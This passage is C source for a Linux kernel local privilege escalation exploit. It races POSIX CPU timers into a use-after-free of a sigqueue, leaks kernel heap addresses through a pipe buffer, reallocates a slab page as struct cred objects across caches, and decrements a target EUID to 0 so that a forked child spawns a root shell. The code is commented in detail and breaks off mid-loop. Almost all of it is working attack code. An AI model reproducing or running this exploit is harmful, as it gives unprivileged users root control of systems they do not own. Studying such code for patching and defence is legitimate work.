// shared pending list instead.
//
// This sigqueue is allocated after the preallocs.
SYSCHK(syscall(__NR_tkill, buggy_pid, SIGRTMIN+1));
// Before dequeueing the SIGRTMIN+2 signal, switch back to a non-cross-cache CPU.
//
// This is because this signal was prepared on a non-cross-cache CPU in the first
// place, and we aren't using it in the cross-cache, so in order to not mess with
// the cross-cache, we have to free it on a different CPU.
pin_on_cpu(1);
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
// Dequeueing this signal will put the pointer of our task struct's pending list
// into the ->prev pointer of the UAF sigqueue.
SYSCHK(read(sigrt2_sfd, &si, sizeof(si)));
} else {
// Child will dequeue the signal for us. Wait for it to finish.
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 2
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 3
}
// Now switch back to the second cross-cache CPU
pin_on_cpu(2);
// Scan the pipe buffer data page for the `next` and `prev` pointer to store them.
// Everything will be zeroes except those pointers at this point in time.
read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf);
size_t other_sigqueue_addr = 0;
size_t task_pending_list_addr = 0;
size_t uaf_sigqueue_offset = 0;
// Increment by `SIGQUEUE_obj_size` and look at the `next` pointer offset.
// NOTE(review): if no non-zero `next` pointer is found, all three values stay 0
// and execution continues regardless - confirm whether that case can occur.
for (int i = 0; i < PAGE_SIZE; i += SIGQUEUE_obj_size) {
other_sigqueue_addr = *((size_t *)(buf + (i + SIGQUEUE_list_next_offset)));
if (other_sigqueue_addr) {
uaf_sigqueue_offset = i;
task_pending_list_addr = *((size_t *)(buf + (i + SIGQUEUE_list_prev_offset)));
printf("\t[+] Heap leaks:\n");
printf("\t\t- UAF sigqueue page offset 0x%lx\n", uaf_sigqueue_offset);
printf("\t\t- Other sigqueue 0x%lx\n", other_sigqueue_addr);
printf("\t\t- Task pending list addr 0x%lx\n", task_pending_list_addr);
break;
}
}
// Set up the UAF sigqueue so we can leak its own address now.
// Key points are:
//
// 1. Setting `next` and `prev` both to the other sigqueue's address ensures
// that the UAF sigqueue's pointer stays in the task pending list.
// 2. `info.si_signo` must be set to SIGUSR2, otherwise the signal will not
// be dequeued.
// 3. `SIGQUEUE_PREALLOC` does not technically need to be set, but I just do it anyway.
memset(buf, 0, PAGE_SIZE);
*((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next
*((size_t *)(buf + SIGQUEUE_list_prev_offset)) = other_sigqueue_addr;// list->prev
*((int *)(buf + SIGQUEUE_flags_offset)) = SIGQUEUE_PREALLOC; // flags
*((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGUSR2; // info.si_signo
write_pipe(realloc_pipefds, SIGQUEUE_info_si_signo_offset + sizeof(int), uaf_sigqueue_offset, buf);
// Now drain the UAF sigqueue's signal to write its own pointers back into itself.
// This will happen because of the `list_del_init()` in `collect_signal()`.
//
// NOTE: This overwrites the other sigqueue's `next` and `prev` pointers to point
// back to the other sigqueue's address. However, the task pending list's
// `prev` pointer still points to other sigqueue's address. Basically,
// when we free the other sigqueue soon, the task pending list's `prev`
// pointer won't be updated.
//
// All this means is that we can't append anymore signals to this task's pending
// list after this point.
//
// NOTE: After this, SIGUSR2 is removed from the task's signal mask, but
// SIGRTMIN+1 stays.
//
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));
} else {
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 4
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 5
}
// Read the UAF sigqueue's own address now through the pipe buffer
size_t uaf_sigqueue_addr = 0;
read_pipe(realloc_pipefds, 8, uaf_sigqueue_offset, buf);
uaf_sigqueue_addr = *((size_t *)(buf + SIGQUEUE_list_next_offset));
printf("\t\t- UAF sigqueue address 0x%lx\n", uaf_sigqueue_addr);
// Now free the other sigqueue back to the freelist of its slab page.
//
// Since our UAF sigqueue is at the head of the pending list, set its next pointer
// to point to the other sigqueue so the list can be traversed to it.
//
// The PAGE_SIZE read below empties whatever is still queued in the pipe;
// read_pipe() does not check the length of its final read.
read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe
*((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next
write_pipe(realloc_pipefds, SIGQUEUE_list_next_offset + sizeof(size_t), uaf_sigqueue_offset, buf);
// Finally, dequeue the other signal's sigqueue and free it. It's SIGRTMIN+1.
//
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
} else {
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 6
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 7
}
printf("\n[+] Stage 3 - Cross-cache the other sigqueue's slab\n");
// Now, second cross-cache post allocs. The target sigqueue is the
// other sigqueue, which was just freed.
sigqueue_crosscache_postallocs();
// Before freeing the other sigqueue's slab page back to the page allocator,
// fork NUM_CRED_PROCS processes. Do this on a non-cross-cache CPU.
//
// This is preparing for the `struct cred` spray later.
pin_on_cpu(1);
printf("\t[+] Preparing %d processes for future `struct cred` spray\n", NUM_CRED_PROCS);
int cred_parent_pfds[2];
int cred_child_pfds[2];
SYSCHK(pipe(cred_parent_pfds));
SYSCHK(pipe(cred_child_pfds));
for (int i = 0; i < NUM_CRED_PROCS; i++) {
pid_t pid = SYSCHK(fork());
if (!pid) {
// child process
SYSCHK(close(cred_parent_pfds[1]));
SYSCHK(close(cred_child_pfds[0]));
// Wait for the parent to wake us up to call `setresuid(-1,-1,-1)`
SYSCHK(read(cred_parent_pfds[0], &m, 1));
// Pin on same CPU as the cross-cache CPU before calling
// `setresuid(-1,-1,-1)`. This allocates one cred struct.
pin_on_cpu(2);
SYSCHK(setresuid(-1,-1,-1));
// Reset CPU and let the parent know we finished.
pin_on_cpu(1);
SYSCHK(write(cred_child_pfds[1], &m, 1));
// Wait for the parent to potentially decrement our EUID to 0.
SYSCHK(read(cred_parent_pfds[0], &m, 1));
// Check our EUID
uid_t euid = geteuid();
// If we have root privs now, just spawn a shell
if (euid == 0) {
printf("\t[+] Found child process with euid=%d!\n", euid);
printf("\t[+] Spawning root shell...\n");
printf("\n");
printf("\n");
printf("\n");
// Must set our UID and GID to 0 as well. "/bin/sh" seems to do a
// `setuid(getuid())`, and since we only changed our EUID,
// that resets our privs here.
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system("/bin/sh");
} else {
// Parent won't wake us up anymore, wake up the parent and
// block forever
SYSCHK(write(cred_child_pfds[1], &m, 1));
SYSCHK(read(cred_parent_pfds[0], &m, 1));
}
// NOTE(review): nothing in this child branch exits or breaks, so once
// system() or the final read() returns, the child goes on to the next
// iteration of the enclosing fork loop - confirm this is intended.
}
}
// Continuing in the parent process now.
SYSCHK(close(cred_parent_pfds[0]));
SYSCHK(close(cred_child_pfds[1]));
// For later, pick the second cred object in the other sigqueue's slab arbitrarily.
size_t target_cred_addr = (other_sigqueue_addr & ~0xfff) + CRED_JAR_slab_size;
printf("\t[+] Target cred object to modify will be at 0x%lx\n", target_cred_addr);
// Now free the other sigqueue's slab page, make sure to switch CPUs back to the
// second cross-cache CPU!
pin_on_cpu(2);
free_crosscache_sigqueues();
// Wake up each child process to call `setresuid(-1,-1,-1)`
//
// NOTE: Writing to the pipe will allocate new pages. Switch
// to a non-cross-cache CPU to do this.
pin_on_cpu(1);
for (int i = 0; i < NUM_CRED_PROCS; i++) {
SYSCHK(write(cred_parent_pfds[1], &m, 1));
SYSCHK(read(cred_child_pfds[0], &m, 1));
}
printf("\t[+] Reallocated other sigqueue's slab as a `struct cred` page\n");
printf("\n[+] Stage 4 - Decrement EUID of target cred to 0\n");
// At this point, SIGUSR2 will have been removed from the task's pending signal mask,
// but SIGRTMIN+1 will still be on it. Set up the UAF sigqueue to use SIGRTMIN+1.
//
// Setting up the `user` pointer to `target_address - 8` gives us an arbitrary
// decrement primitive. Point this to the target cred's EUID offset - 8.
read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe
memset(buf, 0, PAGE_SIZE);
*((size_t *)(buf + SIGQUEUE_list_next_offset)) = uaf_sigqueue_addr; // list->next
*((size_t *)(buf + SIGQUEUE_list_prev_offset)) = uaf_sigqueue_addr;// list->prev
*((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGRTMIN+1; // info.si_signo
*((size_t *)(buf + SIGQUEUE_user_offset)) = target_cred_addr + CRED_JAR_euid_offset - 8uLL; // user
write_pipe(realloc_pipefds, SIGQUEUE_user_offset + sizeof(size_t), uaf_sigqueue_offset, buf);
// Arbitrary decrement time! Decrement target cred's EUID to 0. This process
// will have the same UID as the target cred, so we can use that to know
// how many times to decrement.
//
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
for (int i = 0; i < getuid(); i++) {
SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
}
} else {
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 8
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 9
}
printf("\t[+] Exploit finished. Searching for child with EUID 0...\n");
// Now wake up each child process to check which one is root.
// If we find the root process, we'll block forever and the child
// can launch a shell.
for (int i = 0; i < NUM_CRED_PROCS; i++) {
SYSCHK(write(cred_parent_pfds[1], &m, 1));
SYSCHK(read(cred_child_pfds[0], &m, 1));
}
// If we ever get here, the exploit failed for some reason.
printf("[!!!] Exploit failed! I have no idea why XD try again?\n");
}
int main(int argc, char *argv[]) {
// exploit process
char m;
// Parent and child setup
// Use pipes to communicate between parent and child
SYSCHK(pipe(exploit_child_to_parent));
SYSCHK(pipe(exploit_parent_to_child));
pid_t pid = SYSCHK(fork());
if (pid) {
// exploit parent process
pin_on_cpu(0);
close(exploit_child_to_parent[1]);
close(exploit_parent_to_child[0]);
prctl(PR_SET_NAME, "EXPLOIT_PARENT");
pid_t racer_tid;
// Reallocated timer event - use SIGUSR2 as it will be easy to
// tell we won the race if we ever receive SIGUSR2 on the child thread.
//
// Send the signal to ourself specifically, so it uses our pending
// list instead of the shared pending list.
struct sigevent realloc_evt = {0};
realloc_evt.sigev_notify = SIGEV_SIGNAL | SIGEV_THREAD_ID;
realloc_evt.sigev_signo = SIGUSR2;
realloc_evt._sigev_un._tid = (pid_t)syscall(SYS_gettid);
// realloc_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // For debugging
// Create SIGUSR2 sfd, and block SIGUSR2 and SIGRTMIN+1 and SIGRTMIN+2 on this process.
sigset_t block_mask;
sigemptyset(&block_mask);
sigaddset(&block_mask, SIGUSR2);
int sigusr2_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));\
sigaddset(&block_mask, SIGRTMIN+1);
sigaddset(&block_mask, SIGRTMIN+2);
SYSCHK(sigprocmask(SIG_BLOCK, &block_mask, NULL));
// itimerspec that fires the timer immediately when used with `TIMER_ABSTIME`.
struct itimerspec fire_ts = {0};
fire_ts.it_value.tv_nsec = 1;
int parent_settime_delay = PARENT_SETTIME_DELAY_US;
// int parent_settime_delay = 200 * 1000; // KERNEL PATCH: 200ms delay
// Prepare the preallocs for cross-cache for parent process
// NOTE: Must be on CPU 3!
pin_on_cpu(3);
sigqueue_crosscache_preallocs();
pin_on_cpu(0);
// On a different CPU to the cross-cache CPUs, enqueue a `SIGRTMIN+2` signal.
// This is used later to leak the task pending list address.
pid_t my_pid = (pid_t)syscall(SYS_gettid);
SYSCHK(syscall(__NR_tkill, my_pid, SIGRTMIN+2));
while (1) {
// Initially pin to CPU 0
pin_on_cpu(0);
// Reset `realloc_timer` on each try.
realloc_timer = (void *) -1;
// Receive child process's RACER thread's TID for reaping later
SYSCHK(read(exploit_child_to_parent[0], &racer_tid, sizeof(pid_t))); // sync 1
// Attach to the RACER thread and continue it
SYSCHK(ptrace(PTRACE_ATTACH, racer_tid, NULL, NULL));
SYSCHK(waitpid(racer_tid, NULL, __WALL));
SYSCHK(ptrace(PTRACE_CONT, racer_tid, NULL, NULL));
// Signal to child that we attached and continued
SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 2
// Reap the RACER thread.
//
// At this point, this should block while the RACER thread is consuming CPU
// time. There are three possible outcomes:
//
// 1. If the RACER thread exits and enters `handle_posix_cpu_timers()` AFTER
// `do_exit() -> exit_notify()` has woken us up, `waitpid()` will reap the
// RACER thread at that point and allow the timer to be freed.
//
// 2. If the RACER thread fires timers too early, then we'll just wake up
// after the race window is completely gone.
//
// 3. If the RACER thread never fires the timers, we'll also return after the
// race window is completely gone.
SYSCHK(waitpid(racer_tid, NULL, __WALL));
// Assume we won the race for now. Only the child process can tell us for sure.
// Child process will be waiting for us to let it know after `waitpid()` returns.
SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 3
// Child process `free_func()` thread lets us know when it freed the UAF timer so
// we can re-allocate it.
//
// Ensure to switch to CPU 3 before re-allocating.
pin_on_cpu(3);
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 4
// Either `free_func()` sends us SUCCESS, or the child process main thread sends us FAIL.
// In the success case, we are potentially in the race window with a freed timer.
if (m == SUCCESS_CHAR) {
// At this point, we know that the timers fired, because the SUCCESS_STR is only
// sent by the `free_func()` thread.
//
// But we don't know if we won the 1st race or not.
//
// In any case, we re-allocate the UAF timer now, because it prevents hitting the
// `BUG_ON` in `send_sigqueue()` if the timer was actually freed.
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &realloc_evt, &realloc_timer));
// If we assume we won the race, now `realloc_timer->sigq` is the same as `uaf_timer->sigq`,
// and `uaf_timer` is currently being handled by `handle_posix_cpu_timers()` via RACER thread.
//
// We want to wait a certain amount of time to let the RACER thread enter `send_sigqueue()`
// with the `uaf_timer->sigq`, and go past the `!list_empty()` check.
usleep(parent_settime_delay);
// Once past the `!list_empty()` check in `send_sigqueue()`,
// the `signalfd_notify()` is going to extend the 2nd race window for us.
//
// In that 2nd race window, use `timer_settime()` to fire the realloc timer immediately
// by setting the time in the past, and using `TIMER_ABSTIME`.
//
// If we time it just right, the RACER thread's `send_sigqueue()` will be past the
// `!list_empty()` check, and we'll also get past the check before either thread is
// able to insert the `sigqueue` into the target task's pending list.
//
// At this point, if all of it lined up, this same `sigqueue` will be inserted into both
// parent and child's pending lists at the same time.
SYSCHK(timer_settime(realloc_timer, TIMER_ABSTIME, &fire_ts, NULL));
// The child process will tell us whether it received SIGUSR2 or not. This
// is how we know whether we won the first race or not.
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 5
// If the child tells us that it didn't receive SIGUSR2, then there are two
// situations:
//
// 1. We lost the 1st race, so the child received NUM_TIMERS+1 SIGUSR1 signals. This
// means the child never could have seen the SIGUSR2 signal.
// 2. We won the 1st race, but didn't win the 2nd race. This means the child could
// have seen the SIGUSR2 signal, but since it says it didn't, it means our timer
// fired too early.
//
// In the 2nd case, the signal's `overrun` field will be set to 1.
if (m == FAIL_CHAR) {
// NOTE: no need to poll here, because we'll have the signal here for sure.
// After all, we fired it didn't we? :p
struct signalfd_siginfo si;
SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));
// Check for the 2nd case above, did the child receive the SIGUSR2 signal
// after it was already queued into our pending list?
if (si.ssi_overrun > 0) {
// We queued the SIGUSR2 too early into our pending list, so
// increase the `timer_settime()` delay for next time.
printf("\t[+] Parent raced too early, readjusting...\n");
parent_settime_delay += PARENT_SETTIME_DELAY_US_DELTA;